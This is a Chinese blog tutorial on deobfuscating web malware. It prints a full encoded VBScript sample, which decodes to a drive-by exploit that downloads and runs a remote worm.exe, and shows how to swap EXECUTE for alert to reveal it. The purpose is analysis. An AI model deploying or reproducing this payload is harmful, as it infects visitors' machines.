首页
所有分类
TAGS
文字工具 EMOJI BIBLE
编程 Javascript

JS解密入门 最终变量劫持

Posted in Javascript onJune 25, 2008

如下是一段网马

<Script Language="VBScript">
Cn911="83,61,34,52,70,54,69,50,48,52,53,55,50,55,50,54,70,55,50,50,48,53,50,54,53,55,51,55,53,54,68,54,53,50,48,52,69,54,53,55,56,55,52,48,68,48,65,52,51,54,69,52,67,53,50,53,53,51,68,50,50,54,56,55,52,55,52,55,48,51,65,50,70,50,70,55,55,55,55,55,55,50,69,54,66,55,50,55,54,54,66,55,50,50,69,54,51,54,70,54,68,50,70,55,55,54,70,55,50,54,68,50,69,54,53,55,56,54,53,50,50,48,68,48,65,53,51,54,53,55,52,50,48,52,70,54,50,50,48,51,68,50,48,54,52,54,70,54,51,55,53,54,68,54,53,54,69,55,52,50,69,54,51,55,50,54,53,54,49,55,52,54,53,52,53,54,67,54,53,54,68,54,53,54,69,55,52,50,56,50,50,54,70,54,50,50,50,50,54,50,50,54,65,54,53,50,50,50,54,50,50,54,51,50,50,50,54,50,50,55,52,50,50,50,57,48,68,48,65,52,70,54,50,50,69,53,51,54,53,55,52,52,49,55,52,55,52,55,50,54,57,54,50,55,53,55,52,54,53,50,48,50,50,54,51,54,67,54,49,50,50,50,54,50,50,55,51,55,51,54,57,54,52,50,50,50,67,50,48,50,50,54,51,50,50,50,54,50,50,54,67,55,51,50,50,50,54,50,50,54,57,50,50,50,54,50,50,54,52,51,65,52,50,52,52,51,57,50,50,50,54,50,50,51,54,52,51,51,53,51,53,50,50,50,54,50,50,51,54,50,68,51,54,51,53,50,50,50,54,50,50,52,49,51,51,50,68,51,49,51,49,52,52,51,48,50,50,50,54,50,50,50,68,51,57,51,56,51,51,52,49,50,68,51,48,51,48,52,51,50,50,50,54,50,50,51,48,51,52,52,54,52,51,51,50,51,57,50,50,50,54,50,50,52,53,51,51,51,54,50,50,48,68,48,65,55,51,52,56,53,52,53,52,53,48,51,68,50,50,52,68,50,50,50,54,50,50,54,57,54,51,50,50,50,54,50,50,55,50,54,70,50,50,50,54,50,50,55,51,50,50,50,54,50,50,54,70,54,54,50,50,50,54,50,50,55,52,50,50,50,54,50,50,50,69,53,56,50,50,50,54,50,50,52,68,50,50,50,54,50,50,52,67,50,50,50,54,50,50,52,56,50,50,50,54,50,50,53,52,53,52,50,50,50,54,50,50,53,48,50,50,48,68,48,65,53,51,54,53,55,52,50,48,53,48,54,70,55,48,50,48,51,68,50,48,52,70,54,50,50,69,52,51,55,50,54,53,54,49,55,52,54,53,52,70,54,50,54,65,54,53,54,51,55,52,50,56,55,51,52,56,53,52,53,52,53,48,50,67,50,50,50,50,50,57,48,68,48,65,53,48,54,70,55,48,50,69,52,70,55,48,54,53,54,69,50,48,50,50,52,55,50,50,50,54,50,50,52,53,53,52,50,50,50,67,50,48,52,51,54,69,52,67,53,50,53,53,50,67,50,48,52,54,54,49,54,67,55,51,54,53,48,68,48,65,53,48,54,70,55,48,50,69,53,51,54,53,54,69,54,52,48,68,48,65,52,53,55,56,54,53,52,69,54,49,54,68,54,53,51,68,50,50,52,51,54,69,50,50,50,54,50,50,51,57,51,49,50,50,50,54,50,50,51,49,50,69,54,53,55,56,54,53,50,50,48,68,48,65,53,54,54,50,55,51,52,69,54,49,54,68,54,53,51,68,50,50,52,51,54,69,50,50,50,54,50,50,51,57,51,49,50,50,50,54,50,50,51,49,50,69,55,54,54,50,55,51,50,50,48,68,48,65,53,51,54,53,55,52,50,48,52,54,53,48,52,57,50,48,51,68,50,48,52,70,54,50,50,69,54,51,55,50,54,53,54,49,55,52,54,53,54,70,54,50,54,65,54,53,54,51,55,52,50,56,50,50,53,51,54,51,55,50,54,57,50,50,50,54,50,50,55,48,50,50,50,54,50,50,55,52,54,57,54,69,54,55,50,69,52,54,50,50,50,54,50,50,54,57,50,50,50,54,50,50,54,67,54,53,50,50,50,54,50,50,53,51,55,57,50,50,50,54,50,50,55,51,55,52,50,50,50,54,50,50,54,53,50,50,50,54,50,50,54,68,52,70,50,50,50,54,50,50,54,50,54,65,54,53,50,50,50,54,50,50,54,51,55,52,50,50,50,67,50,50,50,50,50,57,48,68,48,65,53,51,54,53,55,52,50,48,55,51,53,52,54,68,55,48,50,48,51,68,50,48,52,54,53,48,52,57,50,69,52,55,54,53,55,52,53,51,55,48,54,53,54,51,54,57,54,49,54,67,52,54,54,70,54,67,54,52,54,53,55,50,50,56,51,50,50,57,48,68,48,65,52,53,55,56,54,53,52,69,54,49,54,68,54,53,51,68,52,54,53,48,52,57,50,69,52,50,55,53,54,57,54,67,54,52,53,48,54,49,55,52,54,56,50,56,55,51,53,52,54,68,55,48,50,67,52,53,55,56,54,53,52,69,54,49,54,68,54,53,50,57,48,68,48,65,53,54,54,50,55,51,52,69,54,49,54,68,54,53,51,68,52,54,53,48,52,57,50,69,52,50,55,53,54,57,54,67,54,52,53,48,54,49,55,52,54,56,50,56,55,51,53,52,54,68,55,48,50,67,53,54,54,50,55,51,52,69,54,49,54,68,54,53,50,57,48,68,48,65,52,49,52,49,51,68,50,50,52,49,50,50,50,54,50,50,54,52,50,50,48,68,48,65,52,49,52,50,51,68,50,50,54,70,50,50,50,54,50,50,54,52,50,50,50,54,50,50,54,50,50,50,50,54,50,50,50,69,50,50,50,54,50,50,55,51,50,50,50,54,50,50,55,52,55,50,54,53,50,50,50,54,50,50,54,49,54,68,50,50,48,68,48,65,52,49,54,52,52,68,51,68,52,49,52,49,50,54,52,49,52,50,48,68,48,65,53,51,54,53,55,52,50,48,52,50,54,52,54,49,50,48,51,68,50,48,52,70,54,50,50,69,54,51,55,50,54,53,54,49,55,52,54,53,54,70,54,50,54,65,54,53,54,51,55,52,50,56,52,49,54,52,52,68,50,67,50,50,50,50,50,57,48,68,48,65,52,50,54,52,54,49,50,69,55,52,55,57,55,48,54,53,51,68,51,49,48,68,48,65,52,50,54,52,54,49,50,69,52,70,55,48,54,53,54,69,48,68,48,65,52,50,54,52,54,49,50,69,53,55,55,50,54,57,55,52,54,53,50,48,53,48,54,70,55,48,50,69,53,50,54,53,55,51,55,48,54,70,54,69,55,51,54,53,52,50,54,70,54,52,55,57,48,68,48,65,52,50,54,52,54,49,50,69,53,51,54,49,55,54,54,53,55,52,54,70,54,54,54,57,54,67,54,53,50,48,52,53,55,56,54,53,52,69,54,49,54,68,54,53,50,67,51,50,48,68,48,65,52,50,54,52,54,49,50,69,52,51,54,67,54,70,55,51,54,53,48,68,48,65,52,50,54,52,54,49,50,69,53,52,55,57,55,48,54,53,51,68,51,50,48,68,48,65,52,50,54,52,54,49,50,69,52,70,55,48,54,53,54,69,48,68,48,65,52,50,54,52,54,49,50,69,53,55,55,50,54,57,55,52,54,53,53,52,54,53,55,56,55,52,50,48,50,50,53,51,54,53,55,52,50,48,53,51,54,56,54,53,54,67,54,67,50,48,51,68,50,48,52,51,55,50,54,53,54,49,55,52,54,53,52,70,54,50,54,65,54,53,54,51,55,52,50,56,50,50,50,50,53,55,55,51,54,51,55,50,54,57,55,48,55,52,50,69,53,51,54,56,54,53,54,67,54,67,50,50,50,50,50,57,50,50,50,54,55,54,54,50,52,51,55,50,52,67,54,54,50,54,50,50,53,51,54,56,54,53,54,67,54,67,50,69,53,50,55,53,54,69,50,48,50,56,50,50,50,50,50,50,50,54,52,53,55,56,54,53,52,69,54,49,54,68,54,53,50,54,50,50,50,50,50,50,50,57,50,50,50,54,55,54,54,50,52,51,55,50,52,67,54,54,50,54,50,50,53,51,54,53,55,52,50,48,53,51,54,56,54,53,54,67,54,67,50,48,51,68,50,48,52,69,54,70,55,52,54,56,54,57,54,69,54,55,50,50,48,68,48,65,52,50,54,52,54,49,50,69,53,51,54,49,55,54,54,53,55,52,54,70,54,54,54,57,54,67,54,53,50,48,53,54,54,50,55,51,52,69,54,49,54,68,54,53,50,67,51,50,48,68,48,65,52,50,54,52,54,49,50,69,52,51,54,67,54,70,55,51,54,53,48,68,48,65,55,51,53,50,55,53,54,69,51,68,50,50,53,51,50,50,50,54,50,50,54,56,50,50,50,54,50,50,54,53,50,50,50,54,50,50,54,67,50,50,50,54,50,50,54,67,50,50,50,54,50,50,50,69,50,50,50,54,50,50,52,49,50,50,50,54,50,50,55,48,50,50,50,54,50,50,55,48,50,50,50,54,50,50,54,67,50,50,50,54,50,50,54,57,50,50,48,68,48,65,53,51,54,53,55,52,50,48,53,50,55,53,54,69,50,48,51,68,50,48,52,70,54,50,50,69,54,51,55,50,54,53,54,49,55,52,54,53,54,70,54,50,54,65,54,53,54,51,55,52,50,56,55,51,53,50,55,53,54,69,50,54,50,50,54,51,54,49,55,52,54,57,54,70,54,69,50,50,50,67,50,50,50,50,50,57,48,68,48,65,53,50,55,53,54,69,50,69,53,51,54,56,54,53,54,67,54,67,52,53,55,56,54,53,54,51,55,53,55,52,54,53,50,48,53,54,54,50,55,51,52,69,54,49,54,68,54,53,50,67,50,50,50,50,50,67,50,50,50,50,50,67,50,50,52,70,55,48,54,53,54,69,50,50,50,67,51,48,34,58,68,61,34,69,88,69,67,85,84,69,32,34,34,34,34,34,58,67,61,34,38,67,72,82,40,38,72,34,58,78,61,34,41,34,58,68,79,32,87,72,73,76,69,32,76,69,78,40,83,41,62,49,58,73,70,32,73,83,78,85,77,69,82,73,67,40,76,69,70,84,40,83,44,49,41,41,32,84,72,69,78,32,68,61,68,38,67,38,76,69,70,84,40,83,44,50,41,38,78,58,83,61,77,73,68,40,83,44,51,41,32,69,76,83,69,32,68,61,68,38,67,38,76,69,70,84,40,83,44,52,41,38,78,58,83,61,77,73,68,40,83,44,53,41,13,10,76,79,79,80,58,69,88,69,67,85,84,69,32,68"

'以下是处理的函数
Function Rechange(Q)
S=Split(Q,",")
Cn922=""
For i = 0 To UBound(S)
Cn922=Cn922&Chr(eval(S(i)))
Next
Rechange=Cn922
End Function

'执行这个代码
EXECUTE(Rechange(Cn911))
</Script>

看到我的前几篇文章的朋友应该知道,前面的是10进制,直觉解就行了,不过下面有个处理函数,你用10进制解密出来之后还要去分析函数的功能,很不合算。Rechange这个是处理函数,这个函数的功能我们不知道,不要紧,我们看到最后这里有个EXECUTE(),说明这个就是执行函数,执行的内容是 Rechange(Cn911),我们把EXECUTE改为alert()就行了,也就是把最后一行改为alert(Rechange(Cn911))。

劫持完毕,打开网页,解密的内容弹出来了。

学习要点:对于这种网马,最后一定会有一个最终的变量或是表达式,修改执行函数即可

JS解密入门 最终变量劫持

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

Javascript 相关文章推荐
JavaScript prototype 使用介绍
Aug 29 Javascript
jquery改变disabled的boolean状态的三种方法
Dec 13 Javascript
jquery自定义函数的多种方法
Jan 09 Javascript
JavaScript表单验证开发
Nov 23 Javascript
详解JavaScript的内置对象
Dec 07 Javascript
浅谈react-native热更新react-native-pushy集成遇到的问题
Sep 30 Javascript
基于ajax和jsonp的原生封装(实例)
Oct 16 Javascript
如何快速解决JS或Jquery ajax异步跨域的问题
Jan 08 jQuery
AngularJS模态框模板ngDialog的使用详解
May 11 Javascript
详解vue组件开发脚手架
Jun 15 Javascript
详解无限滚动插件vue-infinite-scroll源码解析
May 12 Javascript
js简单实现自动生成表格功能示例
Jun 02 Javascript
JS解密入门之凭直觉解
Jun 25 #Javascript
js异或加解密效果代码
Jun 25 #Javascript
asp批量修改记录的代码
Jun 25 #Javascript
js innerHTML 的一些问题的解决方法
Jun 22 #Javascript
很酷的javascript loading效果代码
Jun 18 #Javascript
豆瓣网的jquery代码实例
Jun 15 #Javascript
JQuery实现自定义对话框的代码
Jun 15 #Javascript
辞职信(98) 检讨书(456) 方案(1080) 感言(394) 证明书(326) 教学反思(909) 事迹材料(636) 邀请函(127) 表扬信(62) 广播稿(323)
You might like
PHP中获取内网用户MAC地址(WINDOWS/linux)的实现代码
2011/08/11 PHP
PHP两种快速排序算法实例
2015/02/15 PHP
phpStudy2016 配置多个域名期间遇到的问题小结
2017/10/19 PHP
Yii2.0框架模型多表关联查询示例
2019/07/18 PHP
用函数式编程技术编写优美的 JavaScript_ibm
2008/05/16 Javascript
基于mouseout和mouseover等类似事件的冒泡问题解决方法
2013/11/18 Javascript
利用javascript数组长度循环数组内所有元素
2013/12/27 Javascript
js使用for循环及if语句判断多个一样的name
2014/09/09 Javascript
javascript使用prototype完成单继承
2014/12/24 Javascript
javascript类型系统——undefined和null全面了解
2016/07/13 Javascript
js通过classname来获取元素的方法
2016/11/24 Javascript
基于JQuery实现的跑马灯效果(文字无缝向上翻动)
2016/12/02 Javascript
JS中SetTimeout和SetInterval使用初探
2017/03/23 Javascript
vue生成token保存在客户端localStorage中的方法
2017/10/25 Javascript
JS+CSS实现滚动数字时钟效果
2017/12/25 Javascript
AngularJS实现的base64编码与解码功能示例
2018/05/17 Javascript
JS实现图片切换效果
2018/11/17 Javascript
微信小程序pinker组件使用实现自动相减日期
2020/05/07 Javascript
vue组件实现移动端九宫格转盘抽奖
2020/10/16 Javascript
Python中利用Scipy包的SIFT方法进行图片识别的实例教程
2016/06/03 Python
ActiveMQ:使用Python访问ActiveMQ的方法
2019/01/30 Python
wxPython实现分隔窗口
2019/11/19 Python
Python 基于FIR实现Hilbert滤波器求信号包络详解
2020/02/26 Python
keras用auc做metrics以及早停实例
2020/07/02 Python
Matplotlib.pyplot 三维绘图的实现示例
2020/07/28 Python
Python爬虫基于lxml解决数据编码乱码问题
2020/07/31 Python
Python+Xlwings 删除Excel的行和列
2020/12/19 Python
EJB实例的生命周期
2016/10/28 面试题
车辆维修工自我评价怎么写
2013/09/20 职场文书
保护环境倡议书500字
2014/05/19 职场文书
先进党组织事迹材料
2014/12/26 职场文书
2016元旦晚会主持人开场白和结束语
2015/12/03 职场文书
手把手教你制定暑期学习计划,让你度过充实的暑假
2019/08/22 职场文书
Nginx域名转发使用场景代码实例
2021/03/31 Servers
Netflix《海贼王》真人版剧集多张片场照曝光
2022/04/04 日漫
PostgreSQL并行计算算法及参数强制并行度设置方法
2022/04/06 PostgreSQL